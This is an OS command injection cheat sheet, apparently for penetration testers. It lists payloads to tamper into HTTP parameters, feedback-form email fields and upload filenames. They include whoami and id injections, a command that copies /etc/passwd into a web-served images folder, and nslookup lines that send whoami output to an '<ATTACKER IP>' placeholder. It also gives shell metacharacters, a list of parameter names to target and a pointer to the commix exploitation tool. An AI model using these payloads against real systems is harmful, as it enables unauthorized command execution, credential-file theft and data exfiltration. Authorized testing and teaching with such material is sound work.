OS Command Injection

• Found any parameter which fetches for data like "siteID=1", in the HTTP response body then tamper it using :

; whoami
; id
; pwd

• Check the feedback form for any Blind OS injection, tamper the email section with the ping command :

||ping -c 5 127.0.0.1||
|| cat /etc/passwd > /var/www/images/passwd.txt -> access it by tampering any of the image file

• Check for any out-of-band network interaction using the Burp collaborator client tab / ngrok

||nslookup <BURP COLLABORATOR>||
||nslookup <ATTACKER IP>||
||nslookup `whoami` <ATTACKER IP>||

• Meta Characters for OS injections attacks, Both for UNIX and Windows :

&
&&
|
||
-------------------------------Only UNIX-------------------------------------------
;
0x0a
\n
`whoami`
$(whoami)

Note

Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.

• While submitting a file or uploading it to check for file-upload vulnerabilities, Do tamper the filename parameter for any blind injections

`sleep 10`

Found any search parameter on the domain page, do not hesitate to :

/?search=%00{.exec|ping 127.0.0.1}

• Common parameters for testing :

/?query=
/?email=
/?id=
/?username=
/?user=
/?to=
/?from=
/?search=
/?q=
/?s=
/?shopID=
/?blogID=
/?phone=
/?mode=
/?next=
/?firstname=
/?lastname=
/?locale=
/?cmd=
/?sys=
/?system=

• To automate all this, We have a best automation tool to detect command injection vulns :

GitHub - commixproject/commix: Automated All-in-One OS Command Injection Exploitation Tool.GitHub

Commix Github